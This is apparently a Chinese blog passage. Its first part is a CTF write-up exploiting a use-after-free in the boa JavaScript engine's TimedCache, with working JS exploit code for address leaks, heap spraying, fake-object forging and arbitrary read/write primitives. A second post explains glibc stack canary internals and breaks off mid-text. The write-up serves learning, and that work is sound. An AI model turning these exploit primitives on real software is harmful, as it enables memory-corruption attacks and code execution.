如果传入的 lifetime 是一个精心构建的 object，那么我们便可以在 boa 调用 calculate_expire 时执行传入 lifetime 对象的 hook 函数，在这个函数中进行 sleep + gc。这样一来，在 TimedCache::get 函数中就可以尝试返回一个被释放掉的 gc 引用，触发 UAF。

后续便可通过堆喷 + UAF 来进行漏洞利用。

四、浅析 rust-gc

在做题时顺便研究了一下 rust-gc 库，看看有没有多线程竞争的可能。调试发现整个 boa 进程竟然只有一个主线程，当创建的对象总大小超过某个阈值后，boa 才会主动触发 GC 进行 mark & sweep，这个初始阈值每个线程是 100 字节：

// /root/.cargo/registry/src/mirrors.tuna.tsinghua.edu.cn-df7c3c540f42cdbd/gc-0.4.1/src/gc.rs
impl GcBox {
    /// Allocates a garbage collected `GcBox` on the heap,
    /// and appends it to the thread-local `GcBox` chain.
    ///
    /// A `GcBox` allocated this way starts its life rooted.
    pub(crate) fn new(value: T) -> NonNull<Self> {
        GC_STATE.with(|st| {
            let mut st = st.borrow_mut();

            // XXX We should probably be more clever about collecting
            if st.bytes_allocated > st.threshold {
                // HERE! 
                collect_garbage(&mut *st);
                ...
            }
            ...

rust-gc 库不长，花点时间理解库的实现对做题帮助巨大。

每一个 GC 对象都有一个 GC header，用来记录当前对象的一些额外属性。例如 mark 标记，next GC 链上的下一个对象引用等等：

let gcbox = Box::into_raw(Box::new(GcBox {
    header: GcBoxHeader {
        roots: Cell::new(1),
        marked: Cell::new(false),
        next: st.boxes_start.take(),
    },
    data: value,
}));

当应用程序调用 Gc::new 函数创建堆对象时，该函数实际就会通过上面的 GcBox来创建对象：

impl Gc {
    /// Constructs a new `Gc` with the given value.
    ///
    /// # Collection
    ///
    /// This method could trigger a garbage collection.
    ///
    /// # Examples
    ///
    /// 
    /// use gc::Gc;
    ///
    /// let five = Gc::new(5);
    /// assert_eq!(*five, 5);
    /// 
    pub fn new(value: T) -> Self {
        assert!(mem::align_of::>() > 1);

        unsafe {
            // Allocate the memory for the object
            let ptr = GcBox::new(value);

            // When we create a Gc, all pointers which have been moved to the
            // heap no longer need to be rooted, so we unroot them.
            (*ptr.as_ptr()).value().unroot();
            let gc = Gc {
                ptr_root: Cell::new(NonNull::new_unchecked(ptr.as_ptr())),
                marker: PhantomData,
            };
            gc.set_root();
            gc
        }
    }
}

而 Gc<_> 结构体只会持有指向 GcBox<_> 的指针，同时也只有GcBox<_> 的分配与释放才会实际受到 mark&sweep GC 的管理。

当触发 GC 开始 mark 阶段后，GC 会遍历之前维护的 GcBox<_> 链上的元素，将其挨个标记，并递归标记当前结构体的子字段。每个 GcBox 都有一个 root 字段（取值只有0和1），用于表示当前 GcBox 是否在 GC 维护的单向链表上。如果有些 GcBox 是其他 GcBox 的子字段，那么这些身为子字段的 GcBox，其 root 属性就会为 0。GC 回收的正是那些 不在 GcBox 链上且无 mark 的 GcBox。

在通过 Gc::new 创建 GcBox 时，GcBox 不会放置在 Gc 链上；但 gc 可以通过 boa 最顶端的 gc 持有者，一步步递归向下执行 trace 来标记各个 GcBox<_>。整个流程非常的自洽，没有问题。而本题之所以会有漏洞，是因为boa 对 TimeCachedValue 类实现的 custom_trace存在错误 ：

unsafe impl Trace for TimeCachedValue {
    custom_trace!(this, {
        // 外部可变条件
        if !this.is_expired() {
            mark(&this.data);
        } 
    });
}

将外部可变条件判断引入进 trace 中，就会导致出现虽然整体上这个 Gc 变量还在对象树上，但是 GC 中的数据已经被释放的情况。

这里的外部可变条件是：时间。
换句话说，这个 trace 函数的实现违背了一个规则：不允许在变量所有权没有发生任何修改的情况下释放变量。

下面是一个正确使用 custom_trace 的例子：

unsafe impl Trace for OrderedMap {
    custom_trace!(this, {
        for (k, v) in this.map.iter() {
            if let MapKey::Key(key) = k {
                mark(key);
            }
            mark(v);
        }
    });
}

可以看到该实现是尽心尽力地将 trace 传播进子字段中，没有引入其他外部可变条件。

五、漏洞利用

a. UAF

在测试时无意间触发了一个 panic，代码如下：

1
2
3

tc = new TimedCache()
tc.set('k', {}, 0) // lifetime = 0 使得计时器立即过期，JsObject 不再被 mark
[ctrl+D 触发 EOF，垃圾回收开始] // panic!

稍微整了一个稳触发版本：

tc = new TimedCache()
tc.set('k', {}, 0)
tc = null
console.collectGarbage() // panic!

stack trace 很长，大致可以看出和 GC 有关。看了一下代码，这个 panic 是为了限制 Gc<_> 勿在 sweep 阶段对所持有的 GcBox<_> 指针进行解引用，因为这会造成非预期情况，不够安全。

这段代码产生该类型 panic 的原因是因为 UAF。上面代码中 JS 对象{} 所在的 GcBox 本应该为 root=0，即正常不会进入 unsafe 代码块，但由于内存释放，root 字段所在内存的值发生修改，因此 self.rooted() 返回 true，进入 unsafe 代码区域，触发 check 造成 panic：

implSized> Drop for Gc {
    #[inline]
    fn drop(&mut self) {
        // If this pointer was a root, we should unroot it.
        if self.rooted() {
            // 不应该进入此分支
            unsafe {
                self.inner().unroot_inner();
            }
        }
    }
}

一路研究到现在，根据现有的思路，尝试构建出以下 POC:

// console wrapper
let log = (x) => { console.log(x) };
let debug = (x) => { log(console.debug(x)) };
let gc = () => console.collectGarbage();
let sleep = (x) => console.sleep(x);

let fake_timeout = { valueOf() {
    log("[+] fake_timeout called");
    sleep(2000);
    gc();
    return 0; 
}};

let cache = new TimedCache();
cache.set('key', new ArrayBuffer(1024), 1000);
let uaf_obj = cache.get("key", fake_timeout);
debug(uaf_obj);

最后的 debug 输出了一个 JSObject，符合预期：

JsValue @0x75870461d090
Object @0x7587046c08a8
- Methods @0x758704609310
- Array Buffer Data @0x7587046d8000

b. leak heap

接下来要想想该如何泄露有用的地址出来。可以试着将 free 后堆块中的数据输出出来看看：

// tools wrapper
let log = (x) => { console.log(x) };
let debug = (x) => { log(console.debug(x)) };
let gc = () => console.collectGarbage();
let bp = () => console.sysbreak();
let sleep = (x) => console.sleep(x);
let hex = (x) => ("0x" + x.toString(16));

// parse
// let get_js_value = (obj) => 
//     Number.parseInt(console.debug(obj).split("JsValue @")[1].split("\n")[0]);
let get_obj_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Object @")[1].split("\n")[0]);
let get_method_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Methods @")[1].split("\n")[0]);
let get_buffer_data_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Buffer Data @")[1].split("\n")[0]);

let spray_obj = [];

let fake_timeout = { valueOf() {
    log("[+] fake_timeout called");
    sleep(2000);
    gc();

    return 0; 
}};

let cache = new TimedCache();
cache.set('key', new Uint32Array(20), 1000);
let uaf_obj = cache.get("key", fake_timeout);

debug(uaf_obj);
log(uaf_obj.length)
for (let i = 0; i < uaf_obj.length; ++i) {
    log(i + " => " + uaf_obj[i]);
}
bp();

输出：

[+] fake_timeout called
JsValue @0x72d3b041d090
Object @0x72d3b04e7c28
- Methods @0x72d3b0409460

20
0 => 0
1 => 0
2 => 2957263088
3 => 29395
4 => 152870256
5 => 0
6 => 0
7 => 0
8 => 0
9 => 0
10 => 2957103232
11 => 29395
12 => 1
13 => 0
14 => 1
15 => 0
16 => 4282195719
17 => 32767
18 => 2957250560
19 => 29395

可以看到这里的输出有两种数对，每种数对中都有一大一小两个数，组合起来刚好为有效内存地址：

uaf_obj[3] * 0x100000000 + uaf_obj[2] == 0x72d3b04440f0：
这块内存由 rust 自己来管理。在 exp 不变的情况下，这个地址相对于当前段的偏移，将大概在 0x4440f0左右。
uaf_obj[17] * 0x100000000 + uaf_obj[16] == 0x7fffff3d1f07，相对偏移 0x1f07：

注意：set 进 TimedCache 的 Array 长度为 20，太长或太短都无法收集到有意义的指针。

这样我们就能获取到这两个段的基地址；有意思的是，这两个段中间那个被夹着的段正是在执行 main 函数前通过 ctor 执行 mmap 操作所分配的内存，这块内存在每次重启程序后，长度都会发生变化（因为 getrandom）：

注意程序会被调试多次，因此每张图中的地址不会一一对应（例如上图中的地址就无法映射至下图）。

这两个段中，地址较低、大小较大的段为 rust 管理的堆内存，上面存放着许多 rust 创建的对象，注意要和 heap 区分开。

c. spray

堆喷时，需要让数组对象的 Backing store，分配至被释放 JsObject 的 Object 结构体内存空洞。这样一来，我们就可以通过数组对象来改写 UAF JsObject 的 Object 结构体数据，构造 fake object。

在 JS 引擎漏洞利用中，通常会用 Typed Array + ArrayBuffer 类来占据被释放的内存。因为 boa 提供了针对 ArrayBuffer 的指针输出逻辑，而 BigUint64 有助于后续写入内存时以八字节为单位写入数据，这里我们选用 ArrayBuffer 来占内存，使用 BigUint64Array 来解释 ArrayBuffer。

但这里有些问题需要解决，既然要去占有 UAF 对象，那么：

UAF 对象大小该怎么确定？
选什么作为 UAF 对象比较好？

先说第一个问题。我们较难从 rust 代码中直接看出一个结构体的大小，同时也无法得知 rust 在分配堆内存时其堆块 metadata 等内容的长度（甚至堆块有没有 metadata 也不知道），但我们可以通过重复创建相同类型的变量并打印其指针信息来判断。例如：

let spray_objs = [];
for(let i = 0; i < 10; i++) {
    let obj = new ArrayBuffer(0x100); // alloc
    debug(obj);  // output
    log("") // new line
    spray_objs.push(obj);
}

根据输出中多个 Object 指针之间的间隔：

JsValue @0x729fbc61d260
Object @0x729fbc6e8b28
- Methods @0x729fbc609310
- Array Buffer Data @0x729fbc61e800

JsValue @0x729fbc61d2a0
Object @0x729fbc6e8ca8
- Methods @0x729fbc609310
- Array Buffer Data @0x729fbc61e900

JsValue @0x729fbc61d2e0
Object @0x729fbc6e8e28
- Methods @0x729fbc609310
- Array Buffer Data @0x729fbc61ea00

可以得知 ArrayBuffer 类型的 JSObject，其 Object 结构所占用的内存大小（包括 chunk metadata，下同）为 0x180 字节（也就是下面这个结构体）

pub struct Object {
    /// The type of the object.
    pub data: ObjectData,
    /// The collection of properties contained in the object
    properties: PropertyMap,
    /// Instance prototype `__proto__`.
    prototype: JsPrototype,
    /// Whether it can have new properties added to it.
    extensible: bool,
    /// The `[[PrivateElements]]` internal slot.
    private_elements: FxHashMap,
}

那么这样一来就可以比较容易的得知某个 JS 类型的具体内存占用大小。

现在来到第二个问题。由于在 Spray 阶段分配 ArrayBuffer 时，boa 会同时分配 ArrayBuffer object（大小 0x180 字节）和 Backing store（大小由用户指定，内存对齐），那么我们自然希望堆喷时 Backing store 可以占据 UAF memory，而不是被那个与 backing store 同时分配的 ArrayBuffer object 占据。这样一来，UAF object 的大小就不能是 0x180。

构建一个非 0x180 大小的对象其实很简单，由于空对象 {}的 Object 结构体大小已经为 0x180 字节了，因此随意构建一个诸如 {a:{}} 这样的嵌套对象，其 Object 结构体长度就会变更为 0x300字节。结构越复杂的类，Object 结构体的大小就会越大。

现在实战一下堆喷：

// tools wrapper
let log = (x) => { console.log(x) };
let debug = (x) => { log(console.debug(x)) };
let gc = () => console.collectGarbage();
let bp = () => console.sysbreak();
let sleep = (x) => console.sleep(x);
let hex = (x) => ("0x" + x.toString(16));

// parse tools
// let get_js_value = (obj) => 
//     Number.parseInt(console.debug(obj).split("JsValue @")[1].split("\n")[0]);
let get_obj_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Object @")[1].split("\n")[0]);
let get_method_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Methods @")[1].split("\n")[0]);
let get_buffer_data_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Buffer Data @")[1].split("\n")[0]);

let fake_timeout = { valueOf() {
    log("[+] fake_timeout called");
    sleep(2000);
    gc();

    return 0; 
}};

let new_cache = new TimedCache();
new_cache.set('spray', {a:{}}, 1000);
let new_uaf_obj = new_cache.get("spray", fake_timeout);
debug(new_uaf_obj)
log("")

// let spray_obj = null;
let spray_objs = [];
for(let i = 0; i < 10; i++) {
    let obj = new ArrayBuffer(0x300);
    debug(obj);
    log("")
    spray_objs.push(obj);
}

bp();

输出：

JsValue @0x7a7ecde1d090
Object @0x7a7ecdee7aa8      // <----- 1
- Methods @0x7a7ecde09310


JsValue @0x7a7ecde1d0e0
Object @0x7a7ecdee7aa8      // <----- 2
- Methods @0x7a7ecde09310
- Array Buffer Data @0x7a7ecdec6000

JsValue @0x7a7ecde1d120
Object @0x7a7ecdee80a8
- Methods @0x7a7ecde09310
- Array Buffer Data @0x7a7ecdec6300

JsValue @0x7a7ecde1d160
Object @0x7a7ecdee8228
- Methods @0x7a7ecde09310
- Array Buffer Data @0x7a7ecdec6600
...

尬住了，内存空洞被 ArrayBuffer 的 Object 给占住了。粗略判断 rust 内存分配策略可能是 first-fit，分配 0x180 时发现有块 0x300 刚好可以切割，于是就分配走了。

挣扎了一会，终于分配成功了：

// ...
let new_cache = new TimedCache();
new_cache.set('spray', {a:{},b:{}}, 1000);
let new_uaf_obj = new_cache.get("spray", fake_timeout);
debug(new_uaf_obj)
log("")

let spray_objs = [];
for(let i = 0; i < 10; i++) {
    let obj = new ArrayBuffer(0x180);
    debug(obj);
    log("")
    spray_objs.push(obj);
}

输出

JsValue @0x73dcb281d0c0
Object @0x73dcb28e8228     <----- 1
- Methods @0x73dcb2809310


JsValue @0x73dcb281d0a0
Object @0x73dcb28e83a8
- Methods @0x73dcb2809310
- Array Buffer Data @0x73dcb28e8200  <----- 2
...

这次修改主要是把需要 set 进 TimedCache 的那个对象，从 {a:{}} 修改为 {a:{}, b:{}} ，这样一来 Object 结构体的大小就从 0x300 扩展至 0x480。在第一次分配 ArrayBuffer Object 对象时，内存管理器就不会立即从这块被释放的 0x480 上切割，而是获取其他位置的内存；等到第二次需要分配 0x180 大小的 Backing Store 时，再从这块内存空洞上切割一块下来，而 0x180 刚好是 Object 结构体的最低大小。

测试一下是不是真的占据成功了。在 JS 代码后面加个 debug(uaf_obj) 看看此时的输出：

1
2
3

JsValue @0x701d8021d110
Object @0x701d802f0228
- Methods @0x0

ArrayBuffer 分配成功后会清除掉这上面的全部数据，因此此时 uaf_obj 的 Methods 地址变为了 nullptr，验证了堆喷的成功。

d. fake obj

现在我们已经占据了被释放的 Object 对象内存空洞。注意到 boa 上存在 RWX 段，我们可以试着将 shellcode 放置在此处并执行：

这个 RWX 段有些奇怪，在某些情况下是会没有 w 权限的，有些情况又会有。
同时还某些条件下还可能存在两个 RWX 段，神奇。

因此现在较为棘手的任务是构造任意地址读写原语。我们可以先为伪造的 obj 设置 method 指针，尝试构造一个 fake ArrayBuffer：

通过调试与 debug 输出，可知 fake obj 其 method 指针的偏移量为 0x11 * 8 字节。

1 2	let ab = new ArrayBuffer(0x50); views.setBigInt64(8 * 0x11, BigInt(get_method_addr(ab)), true);

但如果只是这样，没有修改 Object 的枚举类型为 ArrayBuffer，那就会在使用这个 ArrayBuffer 时产生异常：

1	Uncaught "TypeError": "buffer must be an ArrayBuffer"

尝试去构造一个完整的 ArrayBuffer，但发现如果仅仅凭借着之前 leak 出来的堆地址，想要构造一个完整的 ArrayBuffer 几乎不可能，因为内部结构实在是太复杂了：

其中涉及到了堆、栈、二进制文件等地址，但目前能拿到的只有堆地址。需要再泄露出栈和二进制文件基地址才可以完成整个 fake obj 的构建。

那要怎么泄露栈和二进制文件基地址呢？还是尝试新壶装旧酒，通过打印被 free 掉的堆块，来看看有没有什么有用的信息。有意思的是，随着 exp 的编写，原先那个只能 leak 两个堆指针的 leak 原语，突然间就又可以多 leak 出一个二进制文件基地址了：

这样一来，此时就有了两个堆的基地址和一个二进制文件的加载基地址，但是还是没有栈指针。不过发现这个程序是直接 panic 而不是 segment fault，说明那些 ArrayBuffer 中的指针完全没用上，不然就会触发非法指针解引用直接 crash 了。

既然指针完全没用上，那么就尝试直接硬凑一些数据上去，看看是什么效果。首先要找到 ObjectKind 在 ObjectData 结构体中的相对偏移。通过调试器找到相对偏移量为0：

之后设置一些非指针数据（这些可能是枚举等）上去，并尝试任意地址读取：

// 3. fake obj
let views = new DataView(spray_objs[0]);
// try to restore the data
let ab = new ArrayBuffer(0x100);
// ArrayBuffer ptr
let ptr = base_addr

// Object Kind (ArrayBuffer)
views.setBigUint64(8 * 0x05, 0x02n, true);        
// Target pointer
views.setBigUint64(8 * 0x06, BigInt(ptr), true);
// some size
views.setBigUint64(8 * 0x07, 0x100n, true);
views.setBigUint64(8 * 0x08, 0x100n, true);
views.setBigUint64(8 * 0x09, 0x100n, true);
views.setBigUint64(8 * 0x0a, 0x101n, true);
views.setBigUint64(8 * 0x11, BigInt(get_method_addr(ab)), true);

debug(ab);
debug(new_uaf_obj)

let new_view = new DataView(new_uaf_obj);
for(let i = 0; i < new_view.byteLength / 8; i++)
    log(new_view.getBigUint64(8 * i).toString(16))

bp();

输出：

可以看到当前 fake object 已经被成功识别为 ArrayBuffer，同时从二进制文件基地址处读取到了 ELF 文件头。任意地址读取原语构造完成！

但是在尝试 fake obj 上执行写入操作时，会触发 panic：

1	thread 'main' panicked at 'Object already borrowed: BorrowMutError', boa_engine/src/builtins/dataview/mod.rs:684:40

调试可得知这个 self.flags 相对 ArrayBuffer 的偏移量，将其置为 0 后该 Panic 成功消失：

但接下来会触发一个 GC 的空指针解引用… 通过栈回溯可以看到，这个 crash 是因为 BigUint64Array 尝试获取 mut 引用时，触发了 Fake obj 的 GC 逻辑，使其开始递归 mark 子字段的数据结构。由于 fake obj 仍然存在一些问题，没能完全复原，因此在递归为 PropertyMap 进行 trace 操作时就会触发 crash：

看看有没有办法绕过 GC。阅读代码发现只要这个 root 调用的条件不满足，就可以绕过 GC:

而这个条件又和刚刚设置的 self.flag 有关。刚刚设置为 0 刚好踩坑了（捂脸），应该设置为 1。设置完成后就可以进入内存写入环节：

上图是在写入时触发 SIGSEGV，不过这个是非常正常的，因为 ELF 头部所在内存是没有写权限的，因此写入会终止。

换个地址测试一下：

// test read and write
views.setBigUint64(8 * 0x06, BigInt(base_addr + 0x1218000), true);
log(new_view.getBigUint64(0).toString(16));
new_view.setBigUint64(0, 0x1122334455667788n);
log(new_view.getBigUint64(0).toString(16));

views.setBigUint64(8 * 0x06, BigInt(base_addr + 0x1218100), true);
log(new_view.getBigUint64(0).toString(16));
new_view.setBigUint64(0, 0x33445566778899aan);
log(new_view.getBigUint64(0).toString(16));

可以看到值已经成功写入目标内存区域：

任意地址写原语构造完成！

六、后续

当任意地址读写原语构造出来后，后续的漏洞利用就是体力活了。利用任意地址读写原语，可以泄露栈、libc 等所有地址，同时也可以实现在数据段上部署 ROP 链，然后通过 stack pivot 来劫持控制流 get shell，这些就不再细讲了。

以下是编写的任意地址读写原语。注意这个 exp 是在本机环境测试，因此有些偏移或堆分布等会存在一些差异。

// tools wrapper
let log = (x) => { console.log(x) };
let debug = (x) => { log(console.debug(x)) };
let gc = () => console.collectGarbage();
let bp = () => console.sysbreak();
let sleep = (x) => console.sleep(x);
let hex = (x) => ("0x" + x.toString(16));

// parse tools
// let get_js_value = (obj) => 
//     Number.parseInt(console.debug(obj).split("JsValue @")[1].split("\n")[0]);
let get_obj_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Object @")[1].split("\n")[0]);
let get_method_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Methods @")[1].split("\n")[0]);
let get_buffer_data_addr = (obj) => 
    Number.parseInt(console.debug(obj).split("Buffer Data @")[1].split("\n")[0]);

let fake_timeout = { valueOf() {
    log("[+] fake_timeout called");
    sleep(2000);
    gc();

    return 0; 
}};

// 1. leak heap addresses
let cache = new TimedCache();
cache.set('leak', new Uint32Array(20), 1000);
let uaf_obj = cache.get("leak", fake_timeout);

debug(uaf_obj);
log(uaf_obj.length)
// for (let i = 0; i < uaf_obj.length; ++i) {
//     log(i + " => " + uaf_obj[i]);
// }

lower_heap_addr = uaf_obj[3] * 0x100000000 + uaf_obj[2] - 0x440f0;
base_addr = uaf_obj[5] * 0x100000000 + uaf_obj[4] - 0x11a9678;
higher_heap_addr = uaf_obj[17] * 0x100000000 + uaf_obj[16] - 0x1f07;
log("[+] lower_heap_addr: " + hex(lower_heap_addr)); 
log("[+] higher_heap_addr: " + hex(higher_heap_addr));
log("[+] base_addr: " + hex(base_addr));
if (((lower_heap_addr | higher_heap_addr | base_addr) & 0xfff) != 0) {
    log("[-] Error wrong addr.")
    bp(); // quit
}
log("[+] Leak successfuly.")

// 2. heap spray
let new_cache = new TimedCache();
new_cache.set('spray', {a:{}, b:{}}, 1000);
let new_uaf_obj = new_cache.get("spray", fake_timeout);
debug(new_uaf_obj)

let spray_objs = [];
// 事实上只要分配一次就够了
for(let i = 0; i < 1; i++) {
    let obj = new ArrayBuffer(0x180);
    debug(obj);
    spray_objs.push(obj);
}

if (get_buffer_data_addr(spray_objs[0]) + 0x28 != get_obj_addr(new_uaf_obj)) {
    log("[-] Error heap spray failed.")
    bp(); // quit
}
log("[+] Heap spray successfuly.")


// 3. fake obj
let views = new DataView(spray_objs[0]);
// // debug write
for(let i = 0; i < views.byteLength / 8; i++)
    views.setBigUint64(8*i, BigInt(i*0x10000 + i), true);
// try to restore the data
let ab = new ArrayBuffer(0x100);
// ArrayBuffer ptr
let ptr = base_addr

// mem chunk header
views.setBigUint64(8 * 0x00, 0x00n, true);
views.setBigUint64(8 * 0x01, BigInt(lower_heap_addr + 0x440f0), true);
views.setBigUint64(8 * 0x02, BigInt(base_addr + 0x11a9678), true);
views.setBigUint64(8 * 0x03, 0x100n, true);
// mut borrow flag
views.setBigUint64(8 * 0x04, 0x01n, true);

// Object Kind (ArrayBuffer)
views.setBigUint64(8 * 0x05, 0x02n, true);        
// Target pointer
views.setBigUint64(8 * 0x06, BigInt(ptr), true);

// some size
views.setBigUint64(8 * 0x07, 0x100n, true);
views.setBigUint64(8 * 0x08, 0x100n, true);
views.setBigUint64(8 * 0x09, 0x100n, true);
views.setBigUint64(8 * 0x0a, 0x101n, true);

views.setBigUint64(8 * 0x0e, BigInt(ptr), true);
views.setBigUint64(8 * 0x0f, 0x100n, true);
views.setBigUint64(8 * 0x10, 0x100n, true);
views.setBigUint64(8 * 0x11, BigInt(get_method_addr(ab)), true);
views.setBigUint64(8 * 0x13, BigInt(base_addr + 0xeab740), true);

views.setBigUint64(8 * 0x1a, 0x08n, true);
views.setBigUint64(8 * 0x21, 0x08n, true);

views.setBigUint64(8 * 0x13, 0x08n, BigInt(base_addr + 0xeab740));
views.setBigUint64(8 * 0x17, 0x08n, BigInt(base_addr + 0xeab740));
views.setBigUint64(8 * 0x1e, 0x08n, BigInt(base_addr + 0xeab740));

debug(ab);
debug(new_uaf_obj);
// bp();

let new_view = new DataView(new_uaf_obj);

// test read and write
views.setBigUint64(8 * 0x06, BigInt(base_addr + 0x1218000), true);
log(new_view.getBigUint64(0).toString(16));
new_view.setBigUint64(0, 0x1122334455667788n);
log(new_view.getBigUint64(0).toString(16));

views.setBigUint64(8 * 0x06, BigInt(base_addr + 0x1218100), true);
log(new_view.getBigUint64(0).toString(16));
new_view.setBigUint64(0, 0x33445566778899aan);
log(new_view.getBigUint64(0).toString(16));

bp();

本题复盘结束。在这次复盘中，主要学习了 rust 在二进制层面的一些特性，同时也算通过这题入了 rust pwn 的一个小门。

七、参考

本次复盘全程参考 r3kapig Defcon-30-Quals 文档 + 群内消息记录讨论，感谢 r3kapig 诸位师傅！

浅析 Linux 程序的 Canary 机制

2022-08-24T16:00:00.000Z

一、简介

一直都比较好奇 Canary 在 Linux 中的实现，但没什么心思去具体了解它的实现。这种好奇心在得知可以通过修改子线程的线程局部存储来达到篡改 canary 目的时达到了高峰，于是想好好去研究一下。

太久没写博客了，这里就简单记录一下。

二、什么是 Canary

Canary 是一种栈保护机制，用于在函数返回时检测当前栈是否被破坏。当函数调用压入新栈帧时，编译器会在新栈帧的栈底放一个随机值，并在函数返回退出栈帧时检查这个随机值是否被破坏。如果被破坏则说明当前存在栈溢出，程序退出：

有意思的是，为了防止 canary 被 printf 等字符串输出函数泄露，canary 的最低位始终为 /x00。

当 Canary 验证失败时，编译器会要求调用 __stack_chk_fail 函数。应用层在触发 canary 异常时所调用的 __stack_chk_fail 函数实现在 glibc 中，该函数会打印一些信息并终止程序。由于该函数在输出信息时会根据 argv[0] 来输出程序路径，因此如果栈溢出长度可控的话，则攻击者可以控制栈底的 argv[0] 指针，利用 __stack_chk_fail 的触发来泄露信息。

注意 Canary 在 Linux 内核中也有应用，若在执行 Linux 内核代码时触发了栈溢出，则控制流将调用位于内核的 __stack_chk_fail 函数，该函数实际调用 panic 以终止内核执行。不过内核的 canary 使用已经有了现成的文章，因此这里不再赘述。

三、深入 glibc

这里参考的是 glibc-2.23，虽然版本偏老但是原理还是不变的。

先一步一步来分析。

1. Canary 来源

在 csu\libc-start.c 中的 __libc_start_main 函数中，可以找到 Canary 的赋值语句：

  /* Set up the stack checker's canary.  */
  uintptr_t stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);
# ifdef THREAD_SET_STACK_GUARD
  THREAD_SET_STACK_GUARD (stack_chk_guard);
# else
  __stack_chk_guard = stack_chk_guard;
# endif

其中，_dl_random 是一个存放来自内核的随机数的地址：

1 2	/* Random data provided by the kernel. / void _dl_random;

这个内核的随机数如果要细究初始化的时间点的话，那只能说是在加载动态链接器之前（一个特别早的时间点）完成，其栈回溯如下：

elf\rtld.c: RTLD_START 宏：动态链接器主入口。

sysdeps\x86_64\dl-machine.h: RTLD_START 宏具体 asm 定义：动态链接器的实现涉及汇编，因此需要根据对应的架构来实现不同汇编代码的动态链接器。从注释和代码中可以得知，动态链接器会先调用 _dl_start_user来做一些初始化，之后将控制流跳转至用户程序的 ELF entry 地址：

/* Initial entry point code for the dynamic linker.
  The C function `_dl_start' is the real entry point;
  its return value is the user program's entry point.  */
#define RTLD_START asm ("\n\
.text\n\
  .align 16\n\
.globl _start\n\
.globl _dl_start_user\n\
_start:\n\
  movq %rsp, %rdi\n\
  call _dl_start\n\
_dl_start_user:\n\

  ...

  # And make sure %rsp points to argc stored on the stack.\n\
  movq %r13, %rsp\n\
  # Jump to the user's entry point.\n\
  jmp *%r12\n\
.previous\n\
");

elf\rtld.c: _dl_start -> _dl_start_final -> _dl_sysdep_start 函数：_dl_sysdep_start 函数会调用一些平台依赖函数来做初始化等等，并调用 dl_main 函数来获取具体的用户程序 entry 地址。不过这个函数我们的重点不在于刚刚说的那些操作，而是这个 for 循环：

ElfW(Addr)
_dl_sysdep_start (void **start_argptr,
     void (*dl_main) (const ElfW(Phdr) *phdr, ElfW(Word) phnum,
          ElfW(Addr) *user_entry, ElfW(auxv_t) *auxv))
{
  ...
  DL_FIND_ARG_COMPONENTS (start_argptr, _dl_argc, _dl_argv, _environ,
         GLRO(dl_auxv));
  for (av = GLRO(dl_auxv); av->a_type != AT_NULL; set_seen (av++))
    ...
   case AT_RANDOM:
   _dl_random = (void *) av->a_un.a_val;
   break;
    ...
  ...
}

start_argptr 是一个指向调用动态链接器 argc, argv, env, auxv 数据的指针，而DL_FIND_ARG_COMPONENTS宏就是把这些数据一个个分门别类放到对应的变量 _dl_argc、_dl_argv、_environ、_dl_auxv 上去。即可以得知该动态链接器被调用的参数除了我们最熟悉的三个以外，还多了一个 auxv。

这个多出来的 auxiliary vector 参数是一个存放辅助程序执行的数据数组，至关重要。该参数里存放了很多有用的信息。这里我们只关心 AT_RANDOM，即来自内核的随机数。这个随机数就是在这里被赋值给 _dl_random 变量用于生成 canary 。

回到 __libc_start_main 函数，在获取到随机数变量后，实际生成 canary 的逻辑如下：

// sysdeps\unix\sysv\linux\dl-osinfo.h
static inline uintptr_t __attribute__ ((always_inline))
_dl_setup_stack_chk_guard (void *dl_random)
{
  union
  {
    uintptr_t num;
    unsigned char bytes[sizeof (uintptr_t)];
  } ret;

  /* We need in the moment only 8 bytes on 32-bit platforms and 16
     bytes on 64-bit platforms.  Therefore we can use the data
     directly and not use the kernel-provided data to seed a PRNG.  */
  memcpy (ret.bytes, dl_random, sizeof (ret));
#if BYTE_ORDER == LITTLE_ENDIAN
  ret.num &= ~(uintptr_t) 0xff;
#elif BYTE_ORDER == BIG_ENDIAN
  ret.num &= ~((uintptr_t) 0xff << (8 * (sizeof (ret) - 1)));
#else
# error "BYTE_ORDER unknown"
#endif
  return ret.num;
}

可以看到，canary 的值与 dl_random 的值相近，不同的是会在低字节处强制置为 \x00 防止泄露，而该逻辑也与我们之前观察得到的结论相符。

2. Canary 保存

我们还是先从 __libc_start_init 函数出发：

  /* Set up the stack checker's canary.  */
  uintptr_t stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);
# ifdef THREAD_SET_STACK_GUARD
  THREAD_SET_STACK_GUARD (stack_chk_guard);
# else
  __stack_chk_guard = stack_chk_guard;
# endif

如果设置了 THREAD_SET_STACK_GUARD 宏，即启用了线程栈保护，那么这个 canary 值就会设置进线程局部存储里：

// sysdeps\x86_64\nptl\tls.h
/* Set the stack guard field in TCB head.  */
# define THREAD_SET_STACK_GUARD(value) \
    THREAD_SETMEM (THREAD_SELF, header.stack_guard, value)

其中，THREAD_SELF 指的是当前线程的线程控制块：

// sysdeps\x86_64\nptl\tls.h
/* Return the thread descriptor for the current thread.

   The contained asm must *not* be marked volatile since otherwise
   assignments like
  pthread_descr self = thread_self();
   do not get optimized away.  */
# define THREAD_SELF \
  ({ struct pthread *__self;                  \
     asm ("mov %%fs:%c1,%0" : "=r" (__self)           \
    : "i" (offsetof (struct pthread, header.self)));        \
     __self;})

而 pthread 结构体的声明如下，根据注释可以得知 pthread 结构体就是线程控制块结构：

/* Thread descriptor data structure.  */
struct pthread
{
  union
  {
#if !TLS_DTV_AT_TP
    /* This overlaps the TCB as used for TLS without threads (see tls.h).  */
    tcbhead_t header;
#else
    struct
    {
      ...
    } header;
#endif

    /* This extra padding has no special purpose, and this structure layout
       is private and subject to change without affecting the official ABI.
       We just have it here in case it might be convenient for some
       implementation-specific instrumentation hack or suchlike.  */
    void *__padding[24];
  };

  ...
}

由于在 x86_64 架构下，TLS_DTV_AT_TP宏定义为 0：

// sysdeps\x86_64\nptl\tls.h

/* The TCB can have any size and the memory following the address the
